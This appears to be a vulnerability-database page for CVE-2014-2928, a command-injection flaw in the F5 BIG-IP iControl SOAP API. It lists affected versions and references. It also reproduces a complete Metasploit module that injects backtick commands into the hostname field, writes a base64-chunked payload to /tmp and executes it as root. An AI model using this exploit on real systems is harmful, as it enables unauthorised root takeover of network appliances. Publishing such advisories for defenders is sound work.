CVE-2014-2928: Details

CVE-2014-2928

68.27%V3
Network
2014-05-12
12h00 +00:00
2014-11-14
13h57 +00:00

CVE Descriptions

The iControl API in F5 BIG-IP LTM, APM, ASM, GTM, Link Controller, and PSM 10.0.0 through 10.2.4 and 11.0.0 through 11.5.1, BIG-IP AAM 11.4.0 through 11.5.1, BIG-IP AFM and PEM 11.3.0 through 11.5.1, BIG-IP Analytics 11.0.0 through 11.5.1, BIG-IP Edge Gateway, WebAccelerator, WOM 10.1.0 through 10.2.4 and 11.0.0 through 11.3.0, Enterprise Manager 2.1.0 through 2.3.0 and 3.0.0 through 3.1.1, and BIG-IQ Cloud, Device, and Security 4.0.0 through 4.3.0 allows remote administrators to execute arbitrary commands via shell metacharacters in the hostname element in a SOAP request.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.1 AV:N/AC:H/Au:S/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare a CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 34927

Publication date: 2014-10-08 22h00 +00:00
Author: Metasploit
EDB Verified: Yes

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "F5 iControl Remote Root Command Execution",
      'Description'    => %q{
        This module exploits an authenticated remote command execution
        vulnerability in the F5 BIGIP iControl API (and likely other
        F5 devices).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bperry' # Discovery, Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2014-2928'],
          ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['F5 iControl', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Sep 17 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
        OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
      ], self.class)
  end

  def check
    get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:get_hostname xmlns:n1="urn:iControl:System/Inet" />
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
      'method' => 'POST',
      'data' => get_hostname,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })

    res.body =~ /y:string">(.*)<\/return/
    hostname = $1
    send_cmd("whoami")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
      'method' => 'POST',
      'data' => get_hostname,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })

    res.body =~ /y:string">(.*)<\/return/
    new_hostname = $1

    if new_hostname == "root.a.b"
      pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>#{hostname}</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}

      send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
        'method' => 'POST',
        'data' => pay,
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      })

      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def send_cmd(cmd)
    pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>`#{cmd}`.a.b</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}

    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
      'method' => 'POST',
      'data' => pay,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })
  end

  def exploit
    filename = Rex::Text.rand_text_alpha_lower(5)

    print_status('Sending payload in chunks, might take a small bit...')
    i = 0
    while i < payload.encoded.length
      cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}"
      send_cmd(cmd)
      i = i + 5
    end

    print_status('Triggering payload...')
    send_cmd("sh /tmp/#{filename}")
  end
end

Products Mentioned

Configuration 0

F5>>Big-ip_webaccelerator >> Version 9.4.0

F5>>Big-ip_webaccelerator >> Version 9.4.1

F5>>Big-ip_webaccelerator >> Version 9.4.2

F5>>Big-ip_webaccelerator >> Version 9.4.3

F5>>Big-ip_webaccelerator >> Version 9.4.4

F5>>Big-ip_webaccelerator >> Version 9.4.5

F5>>Big-ip_webaccelerator >> Version 9.4.6

F5>>Big-ip_webaccelerator >> Version 9.4.7

F5>>Big-ip_webaccelerator >> Version 9.4.8

F5>>Big-ip_webaccelerator >> Version 10.0.0

F5>>Big-ip_webaccelerator >> Version 10.0.1

F5>>Big-ip_webaccelerator >> Version 10.1.0

F5>>Big-ip_webaccelerator >> Version 10.2.0

F5>>Big-ip_webaccelerator >> Version 10.2.1

F5>>Big-ip_webaccelerator >> Version 10.2.2

F5>>Big-ip_webaccelerator >> Version 10.2.3

F5>>Big-ip_webaccelerator >> Version 10.2.4

F5>>Big-ip_webaccelerator >> Version 11.0.0

F5>>Big-ip_webaccelerator >> Version 11.1.0

F5>>Big-ip_webaccelerator >> Version 11.2.0

F5>>Big-ip_webaccelerator >> Version 11.2.1

F5>>Big-ip_webaccelerator >> Version 11.3.0

Configuration 0

F5>>Big-ip_local_traffic_manager >> Version 10.0.0

F5>>Big-ip_local_traffic_manager >> Version 10.0.1

F5>>Big-ip_local_traffic_manager >> Version 10.1.0

F5>>Big-ip_local_traffic_manager >> Version 10.2.0

F5>>Big-ip_local_traffic_manager >> Version 10.2.1

F5>>Big-ip_local_traffic_manager >> Version 10.2.2

F5>>Big-ip_local_traffic_manager >> Version 11.0.0

Configuration 0

F5>>Big-ip_protocol_security_module >> Version 9.4.5

F5>>Big-ip_protocol_security_module >> Version 9.4.6

F5>>Big-ip_protocol_security_module >> Version 9.4.7

F5>>Big-ip_protocol_security_module >> Version 9.4.8

F5>>Big-ip_protocol_security_module >> Version 10.0.0

F5>>Big-ip_protocol_security_module >> Version 10.0.1

F5>>Big-ip_protocol_security_module >> Version 10.1.0

F5>>Big-ip_protocol_security_module >> Version 10.2.0

F5>>Big-ip_protocol_security_module >> Version 10.2.1

F5>>Big-ip_protocol_security_module >> Version 10.2.2

F5>>Big-ip_protocol_security_module >> Version 10.2.3

F5>>Big-ip_protocol_security_module >> Version 10.2.4

F5>>Big-ip_protocol_security_module >> Version 11.0.0

F5>>Big-ip_protocol_security_module >> Version 11.1.0

F5>>Big-ip_protocol_security_module >> Version 11.2.0

F5>>Big-ip_protocol_security_module >> Version 11.2.1

F5>>Big-ip_protocol_security_module >> Version 11.3.0

F5>>Big-ip_protocol_security_module >> Version 11.4.0

F5>>Big-ip_protocol_security_module >> Version 11.4.1

Configuration 0

F5>>Big-ip_link_controller >> Version 10.0.0

F5>>Big-ip_link_controller >> Version 10.0.1

F5>>Big-ip_link_controller >> Version 10.1.0

F5>>Big-ip_link_controller >> Version 10.2.0

F5>>Big-ip_link_controller >> Version 10.2.1

F5>>Big-ip_link_controller >> Version 10.2.2

F5>>Big-ip_link_controller >> Version 11.0.0

Configuration 0

F5>>Big-ip_application_security_manager >> Version 10.0.0

F5>>Big-ip_application_security_manager >> Version 10.0.1

F5>>Big-ip_application_security_manager >> Version 10.1.0

F5>>Big-ip_application_security_manager >> Version 10.2.0

F5>>Big-ip_application_security_manager >> Version 10.2.1

F5>>Big-ip_application_security_manager >> Version 10.2.2

F5>>Big-ip_application_security_manager >> Version 11.0.0

Configuration 0

F5>>Big-ip_global_traffic_manager >> Version 10.0.0

F5>>Big-ip_global_traffic_manager >> Version 10.0.1

F5>>Big-ip_global_traffic_manager >> Version 10.1.0

F5>>Big-ip_global_traffic_manager >> Version 10.2.0

F5>>Big-ip_global_traffic_manager >> Version 10.2.1

F5>>Big-ip_global_traffic_manager >> Version 10.2.2

F5>>Big-ip_global_traffic_manager >> Version 11.0.0

Configuration 0

F5>>Big-ip_wan_optimization_manager >> Version 10.0.0

F5>>Big-ip_wan_optimization_manager >> Version 10.0.1

F5>>Big-ip_wan_optimization_manager >> Version 10.1.0

F5>>Big-ip_wan_optimization_manager >> Version 10.2.0

F5>>Big-ip_wan_optimization_manager >> Version 10.2.1

F5>>Big-ip_wan_optimization_manager >> Version 10.2.2

F5>>Big-ip_wan_optimization_manager >> Version 11.0.0

Configuration 0

F5>>Big-ip_access_policy_manager >> Version 10.1.0

F5>>Big-ip_access_policy_manager >> Version 10.2.0

F5>>Big-ip_access_policy_manager >> Version 10.2.1

F5>>Big-ip_access_policy_manager >> Version 10.2.2

F5>>Big-ip_access_policy_manager >> Version 11.0.0

Configuration 0

F5>>Big-ip_edge_gateway >> Version 10.1.0

F5>>Big-ip_edge_gateway >> Version 10.2.0

F5>>Big-ip_edge_gateway >> Version 10.2.1

F5>>Big-ip_edge_gateway >> Version 10.2.2

F5>>Big-ip_edge_gateway >> Version 11.0.0

References

http://seclists.org/fulldisclosure/2014/May/32
Tags: mailing-list, x_refsource_FULLDISC
http://www.exploit-db.com/exploits/34927
Tags: exploit, x_refsource_EXPLOIT-DB
http://www.osvdb.org/106728
Tags: vdb-entry, x_refsource_OSVDB